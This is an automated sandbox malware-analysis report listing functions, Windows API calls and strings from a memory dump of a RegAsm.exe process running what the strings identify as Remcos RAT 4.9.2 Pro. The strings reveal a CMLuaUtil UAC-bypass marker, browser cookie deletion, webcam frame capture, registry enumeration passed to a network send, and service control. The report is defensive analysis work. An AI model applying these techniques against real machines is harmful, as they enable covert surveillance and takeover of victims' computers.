Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$xUG$TG
API String ID: 3554306468-1165877943
Opcode ID: 64c4bec149cd04c75b22b0529d879bbeb51e457b34214b05c4e78b77d15b4099
Instruction ID: e89ae2fc3e2f172f62eacf7d7454cf1e822e63a892199c4ebc4bb166adb4cb0d
Opcode Fuzzy Hash: 64c4bec149cd04c75b22b0529d879bbeb51e457b34214b05c4e78b77d15b4099
Instruction Fuzzy Hash: F4513C71900219AADB11EBA5DC85EEFB77DAF04309F10407BF505B2191EF786B48CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0044B27C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 0044B2BE
__fassign.LIBCMT ref: 0044B339
__fassign.LIBCMT ref: 0044B354
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B37A
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044B9F1,00000000), ref: 0044B399
WriteFile.KERNEL32(?,?,00000001,0044B9F1,00000000), ref: 0044B3D2

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 7f14d60be4bedc768f9c1ecc07add3f37f6dbe09138a2e94954e294804714371
Instruction ID: 531f87820f5ca7332e2a576686b516ff1612a06bf14289906b3cf5c82a3cface
Opcode Fuzzy Hash: 7f14d60be4bedc768f9c1ecc07add3f37f6dbe09138a2e94954e294804714371
Instruction Fuzzy Hash: 43518170900249AFDB10CFA8DC85AEEBBF4EB09301F14456AE955E7392D734D941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413C5B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00413C94

Part of subcall function 004139A3: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413A0A
Part of subcall function 004139A3: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413A39

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

RegCloseKey.ADVAPI32(00000000), ref: 00413E02

Strings

NG, xrefs: 00413D71
NG, xrefs: 00413CB7
xUG, xrefs: 00413DF4
TG, xrefs: 00413DE8

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: xUG$NG$NG$TG
API String ID: 3114080316-2811732169
Opcode ID: 70d69f6f70ea171df7e6a0513583166be9724872266c77167334a89470832add
Instruction ID: 7dadb05ed7d6a3791a19dcb9bd021d6cac3048b7f1650f13bd058f0b8db42a8b
Opcode Fuzzy Hash: 70d69f6f70ea171df7e6a0513583166be9724872266c77167334a89470832add
Instruction Fuzzy Hash: C5418D316082405BC324F726DC56AEF72959BD1348F40883FF54A671D2EF7C5D4A8AAE

Uniqueness

Uniqueness Score: -1.00%

Function 0041B5D8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00413569: RegOpenKeyExW.ADVAPI32 ref: 0041358B
Part of subcall function 00413569: RegQueryValueExW.ADVAPI32(?,0040F261,00000000,00000000,?,00000400), ref: 004135AA
Part of subcall function 00413569: RegCloseKey.ADVAPI32(?), ref: 004135B3

Part of subcall function 0041BF05: GetCurrentProcess.KERNEL32(?,?,?,0040D9F8,WinDir,00000000,00000000), ref: 0041BF16

_wcslen.LIBCMT ref: 0041B6B1

Strings

.exe, xrefs: 0041B603
8SG, xrefs: 0041B657, 0041B65C
program files (x86)\, xrefs: 0041B6AB
program files\, xrefs: 0041B697, 0041B69E, 0041B6B0
http\shell\open\command, xrefs: 0041B5E8

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue_wcslen
String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
API String ID: 37874593-122982132
Opcode ID: 02f4fff6ae0b27771b2aa90b56d6015931d8b5e32b8987f4592f74a2b3824b19
Instruction ID: c6fac897f3708705da20762e946dcced6dc574eea8f21ad10bd7ff4b63ea14c8
Opcode Fuzzy Hash: 02f4fff6ae0b27771b2aa90b56d6015931d8b5e32b8987f4592f74a2b3824b19
Instruction Fuzzy Hash: 65219272A002082BDB04BAB59C96AFE766D9B49328F10043FF405B72D2FE7C9D48426D

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE37 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 004134F4: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413518
Part of subcall function 004134F4: RegQueryValueExA.KERNEL32 ref: 00413535
Part of subcall function 004134F4: RegCloseKey.KERNEL32(?), ref: 00413540

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BEB9
PathFileExistsA.SHLWAPI(?), ref: 0040BEC6

Strings

Cookies, xrefs: 0040BE4B
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040BE50
[IE cookies cleared!], xrefs: 0040BF13, 0040BF38
[IE cookies not found], xrefs: 0040BE8E

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: b8bc9c740870381f4e858668ab369d3c19ac6bdca3687d6d16855d6904dfb641
Instruction ID: 801003b70fd9dbf496093a5a5275d638bd41a560824cd0b42c2c86a2de3f06d8
Opcode Fuzzy Hash: b8bc9c740870381f4e858668ab369d3c19ac6bdca3687d6d16855d6904dfb641
Instruction Fuzzy Hash: CA214D71A40219A6CB04F7A5CC569EE77699F10704F40017FE602B72D2EB786A498ADE

Uniqueness

Uniqueness Score: -1.00%

Function 00456A93 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5163f705b5a76722ed76b92f7eefec5395c85fe3c1704548f4a356ce2d550a91
Instruction ID: e67e80b8f015ee546dd56432ce4a8dadb94fcda799c7d0fc2e4964d2423921da
Opcode Fuzzy Hash: 5163f705b5a76722ed76b92f7eefec5395c85fe3c1704548f4a356ce2d550a91
Instruction Fuzzy Hash: C711E771504224BBDB206F768C04D6B7A6CEB85376B12452BFD11D7252DE39CC01C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 00450E3B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00450B82: _free.LIBCMT ref: 00450BAB

_free.LIBCMT ref: 00450E89

Part of subcall function 00446642: HeapFree.KERNEL32(00000000,00000000), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 00450E94
_free.LIBCMT ref: 00450E9F
_free.LIBCMT ref: 00450EF3
_free.LIBCMT ref: 00450EFE
_free.LIBCMT ref: 00450F09
_free.LIBCMT ref: 00450F14

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e6862f50bdfb19e703ceb93494df2a480b9e086095d1541665fc20bc27fa83d7
Instruction ID: daec5615db7e7013758d3903cf5d85e3f15d59fd03a3aabe3c4119ba64e21dd5
Opcode Fuzzy Hash: e6862f50bdfb19e703ceb93494df2a480b9e086095d1541665fc20bc27fa83d7
Instruction Fuzzy Hash: CC11B131505B04AAE930BFB2CC47FCB779C5F01319F814C1EBA9A66063CA2CBA094759

Uniqueness

Uniqueness Score: -1.00%

Function 0043A29A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043A291,004391FE), ref: 0043A2A8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A2B6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A2CF
SetLastError.KERNEL32(00000000,?,0043A291,004391FE), ref: 0043A321

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 08359a294978b951ee6febe925dab381d1793c0aace0d6fcdcb34a4de7c4b766
Instruction ID: 23de1630c3ab367d37157a08cb97d7a79375857f6765cbdf10d4ad4e4b451835
Opcode Fuzzy Hash: 08359a294978b951ee6febe925dab381d1793c0aace0d6fcdcb34a4de7c4b766
Instruction Fuzzy Hash: FB01243214C3516EE6142779AC86A6B2648EB1A3BDF20133FFA28416F1EF1D4C91924D

Uniqueness

Uniqueness Score: -1.00%

Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0

Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

CoUninitialize.OLE32 ref: 00407629

Strings

[+] before ShellExec, xrefs: 004075F1
[+] ucmCMLuaUtilShellExecMethod, xrefs: 004075B5
[+] ShellExec success, xrefs: 0040760E
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 004075B0, 004075B3, 00407605

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-2216821008
Opcode ID: d5f38e2754d4a853ae590f96f95492258fb5b30eb1892ff619069dfefece9e33
Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
Opcode Fuzzy Hash: d5f38e2754d4a853ae590f96f95492258fb5b30eb1892ff619069dfefece9e33
Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9EF Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BA2B
GetLastError.KERNEL32 ref: 0040BA35

Strings

\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B9F6
[Chrome Cookies not found], xrefs: 0040BA4F
[Chrome Cookies found, cleared!], xrefs: 0040BA5B
UserProfile, xrefs: 0040B9FB

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 88ba7c6cca983678e9453ff976780c883a64346e89eba16ec9507ec9410efbb7
Instruction ID: f8558398cfa10caab86205241148ba1d2e69b793fc6e43cc3d80b603396840e2
Opcode Fuzzy Hash: 88ba7c6cca983678e9453ff976780c883a64346e89eba16ec9507ec9410efbb7
Instruction Fuzzy Hash: 5C01A271A402095ACA04BBB6DD5B8BE7728D911704F50017FF803725E2FE3E8A458ADE

Uniqueness

Uniqueness Score: -1.00%

Function 0041CCE9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32 ref: 0041CCF2
ShowWindow.USER32(00000000,00000000), ref: 0041CD0B
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CD30

Strings

CONOUT$, xrefs: 0041CD1E
Remcos v, xrefs: 0041CD4B
4.9.2 Pro, xrefs: 0041CD59

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Console$AllocOutputShowWindow
String ID: Remcos v$4.9.2 Pro$CONOUT$
API String ID: 2425139147-375169418
Opcode ID: 8df49d31de9d4cb6383eef02227129476ba2a6c9230629533c9b2db07849b5d1
Instruction ID: a7c8f46aab14db75db5c93cd186e9c048c6b423ceef1700afcb39e88372a2f18
Opcode Fuzzy Hash: 8df49d31de9d4cb6383eef02227129476ba2a6c9230629533c9b2db07849b5d1
Instruction Fuzzy Hash: 9A0144B1E80304AAEB10FBF19D8BF9D376C9B14745F600427B608A70D3EB7D9954466E

Uniqueness

Uniqueness Score: -1.00%

Function 0043AA1C Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0043ABA9
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ABC5
__allrem.LIBCMT ref: 0043ABDC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ABFA
__allrem.LIBCMT ref: 0043AC11
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC2F

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: ab469b58df769677e88436e296b01d902216950b9c6cf3364f1c10046dae446c
Instruction ID: 0494a107bc7118a0c65ff638fd2ae5d498b9f40573f82e97bb56a75a26127c98
Opcode Fuzzy Hash: ab469b58df769677e88436e296b01d902216950b9c6cf3364f1c10046dae446c
Instruction Fuzzy Hash: 89815C72A407066BE720EE7ACC81B6B73A99F48324F14612FF551D6381E77CDD108B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004028A4: std::_Xinvalid_argument.LIBCPMT ref: 004028A9

Sleep.KERNEL32(00000000,0040D1B0), ref: 004044C4

Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C

Strings

OpenCamera, xrefs: 00404582
GetFrame, xrefs: 0040459F
HNG, xrefs: 004045E6
CloseCamera, xrefs: 0040458E
FreeFrame, xrefs: 004045B0

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologSleepXinvalid_argumentstd::_
String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
API String ID: 834325642-3054508432
Opcode ID: ac876104e1f0b67e443610ea6b3a111a87ef9c9979d889905ee47d5e342d999b
Instruction ID: 399280f60de85e060329c6f4ab31165944f92565a6c4adf25c6d9c2547c5904d
Opcode Fuzzy Hash: ac876104e1f0b67e443610ea6b3a111a87ef9c9979d889905ee47d5e342d999b
Instruction Fuzzy Hash: 2351E1B1A042106BCA14BB769D0AA6E3755ABC0748F00053FFA06677E2DF7C8E45839E

Uniqueness

Uniqueness Score: -1.00%

Function 00411C4C Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004116EA: SetLastError.KERNEL32(0000000D,00411C6A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411C48), ref: 004116F0

SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411C48), ref: 00411C85
GetNativeSystemInfo.KERNEL32(?), ref: 00411CF3
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411D17

Part of subcall function 00411BF1: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411D35,?,00000000,00003000,00000040,00000000,?,?), ref: 00411C01

GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411D5E
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411D65
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411E78

Part of subcall function 00411FC5: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411E85,?,?,?,?,?), ref: 00412035
Part of subcall function 00411FC5: HeapFree.KERNEL32(00000000), ref: 0041203C

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID:
API String ID: 3950776272-0
Opcode ID: 2d5080cdee88ae4489b0304f1850a20b2adfe15f654517403e01e164c907dd0f
Instruction ID: aa09dbe93b48559441b8e69703723e77616d2dc90e2c663cf43076ad7bdcd395
Opcode Fuzzy Hash: 2d5080cdee88ae4489b0304f1850a20b2adfe15f654517403e01e164c907dd0f
Instruction Fuzzy Hash: 9E61CF70641311ABD7109F66C981BAB7BA5BF44740F04412AFF058B2A2EB7CE8D1CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00445839 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00445865
__cftoe.LIBCMT ref: 00445897

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 1364b3009bd66bcb199bcbf34342cc4a5849e9b8baf57e56a16afdc955920caa
Instruction ID: 61f1245a5bdd02f6de00c1f3f020f63fedb85c0006fd73e81189f4daecab80f4
Opcode Fuzzy Hash: 1364b3009bd66bcb199bcbf34342cc4a5849e9b8baf57e56a16afdc955920caa
Instruction Fuzzy Hash: 69510B72904A05ABFF20AB598C41BAF77A8DF49334F20421FF815A6293DF3DD910866C

Uniqueness

Uniqueness Score: -1.00%

Function 00447431 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00447539
__freea.LIBCMT ref: 004475E3
__freea.LIBCMT ref: 00447601

Part of subcall function 00435D83: _free.LIBCMT ref: 00435D99

Strings

a/p, xrefs: 004476C8
am/pm, xrefs: 00447664

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm
API String ID: 2936374016-3206640213
Opcode ID: f7eb109463775bf71eaffcc2eefbdb172b66036c1314f4e384167d14f26ad2ad
Instruction ID: 932c9bd22f8cf0e2033f9da72f7f035ab39ca9aaf1c56182f74d334176be82e0
Opcode Fuzzy Hash: f7eb109463775bf71eaffcc2eefbdb172b66036c1314f4e384167d14f26ad2ad
Instruction Fuzzy Hash: 4FD1F631908206DAFB28AF68C899BBBBBB1EF05310F24415BE5059B751D33D9D43CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00410DAF Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00410DBC
int.LIBCPMT ref: 00410DCF

Part of subcall function 0040E00F: std::_Lockit::_Lockit.LIBCPMT ref: 0040E020
Part of subcall function 0040E00F: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E03A

std::_Facet_Register.LIBCPMT ref: 00410E0F
std::_Lockit::~_Lockit.LIBCPMT ref: 00410E18
__CxxThrowException@8.LIBVCRUNTIME ref: 00410E36
__Init_thread_footer.LIBCMT ref: 00410E77

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID:
API String ID: 3815856325-0
Opcode ID: 8a1c56814aaffb39b6a738752dfce106633844222024accdf427d11f3e27a8d3
Instruction ID: 387eaa89caa8dd4f8259d30b56db7845ab8ba92959ee530e51d282b7c15fb7ee
Opcode Fuzzy Hash: 8a1c56814aaffb39b6a738752dfce106633844222024accdf427d11f3e27a8d3
Instruction Fuzzy Hash: 34210432A00924ABC714EB6AD9459DE73A8AF49324F20046FF405A72D1DF78AD81CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABC6 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A2DC,00000000), ref: 0041ABD6
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A2DC,00000000), ref: 0041ABEA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A2DC,00000000), ref: 0041ABF7
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A2DC,00000000), ref: 0041AC2C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A2DC,00000000), ref: 0041AC3E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A2DC,00000000), ref: 0041AC41

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: 8ab29b6f8dfadc739c1cfd945ac31cc587d16b71351be81549c8dfaccb54f5d1
Instruction ID: bf0d9854aa1a1070f110eb920e3bd2440040cbff4b43ec2429cf537062a598c5
Opcode Fuzzy Hash: 8ab29b6f8dfadc739c1cfd945ac31cc587d16b71351be81549c8dfaccb54f5d1
Instruction Fuzzy Hash: 69014E71149215BBD6111B345C0DEFB3B5CDB41771F100317F715921D2EB68CD8195EA

Uniqueness

Uniqueness Score: -1.00%

Function 004480D5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
_free.LIBCMT ref: 0044810C
_free.LIBCMT ref: 00448134
SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 00448141
SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
_abort.LIBCMT ref: 00448153

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 72d9dfed2c612fb7fc40968e50d96285ced74183b045fe3906e70e8c12316b41
Instruction ID: 2456814f90d1a1756791b48dfe751582bdc8db7375cfa681c61f896b21bc20b7
Opcode Fuzzy Hash: 72d9dfed2c612fb7fc40968e50d96285ced74183b045fe3906e70e8c12316b41
Instruction Fuzzy Hash: E2F0A43510470067F612772A6C0BB6F25198BC3B66F36052FF918962A3EE6CCC43816D

Uniqueness

Uniqueness Score: -1.00%

Function 0041A9F4 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA03
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA17
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA24
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA33
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA45
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA48

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 60a7cbc30b89eb0f69decf0df0d6681b0d9bff21bb3b6cb3c15fbc2f13efb0a9
Instruction ID: f73aa30613e04d16d5c4f291a78da36d4cb0244c6024500b3a5cad33c6a737a3
Opcode Fuzzy Hash: 60a7cbc30b89eb0f69decf0df0d6681b0d9bff21bb3b6cb3c15fbc2f13efb0a9
Instruction Fuzzy Hash: 7AF0C231501218ABD611AF659C49DFF3B6CDF45BA6F000026FE0992192DB68CD4595A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041AAF8 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB07
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB1B
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB28
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB37
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB49
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB4C

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: b8efc3080a58efbd5eeef1a2aefda9b54f9d6a5126152bd72706fcf9128d32df
Instruction ID: 37910627c879923e7165713963b3d859e7cdae02db8f746732cc22f85bec5969
